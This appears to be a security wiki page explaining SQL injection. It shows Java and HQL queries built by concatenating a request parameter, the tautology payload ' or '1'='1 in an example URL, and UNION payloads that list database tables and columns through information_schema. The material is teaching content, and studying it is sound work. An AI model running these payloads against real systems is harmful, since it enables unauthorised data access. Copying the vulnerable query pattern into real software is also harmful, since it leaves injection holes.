====== SQL Injection - Example attacks ======

[[SQL Injection - Example attacks:Basic SQL Injection attack|Basic SQL Injection attack]]

[[SQL Injection - Example attacks:Basic SQL Injection attack with defence|Basic SQL Injection attack with defence]]

[[SQL Injection - Example attacks:Incorrect type handling|Incorrect type handling]]

[[SQL Injection - Example attacks:Incorrectly filtered escape characters|Incorrectly filtered escape characters]]

[[SQL Injection - Example attacks:SQL Injection attack against PHP addslashes|SQL Injection attack against PHP addslashes]]

[[SQL Injection - Example attacks:SQL injection that gets around mysql_real_escape_string()|SQL injection that gets around mysql_real_escape_string()]]


===== Example attacks =====

**Scenario #1**: The application uses untrusted data in the construction of the following vulnerable SQL call:

<code java>
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
</code>

**Scenario #2**: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g., Hibernate Query Language (HQL)):

<code sql>
Query HQLQuery = session.createQuery(“FROM accounts WHERE custID='“ + request.getParameter("id") + "'");
</code>

In both cases, the attacker modifies the ‘id’ parameter value in her browser to send: ' or '1'='1.  

For example:  http://example.com/app/accountView?id=' or '1'='1

This changes the meaning of both queries to return all the records from the accounts table.   More dangerous attacks could modify data or even invoke stored procedures.


===== Other attacks =====

Passing the following in as input.

<code php>
 -1 union all select table_name from information_schema.tables
</code>

and now just extract table structure:

<code sql>
SELECT ... WHERE id = -1 union all select column_name from information_schema.column where table_name = 0x61727469636c65
</code>


===== References =====

  * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

  * http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html

  * https://en.wikipedia.org/wiki/SQL_injection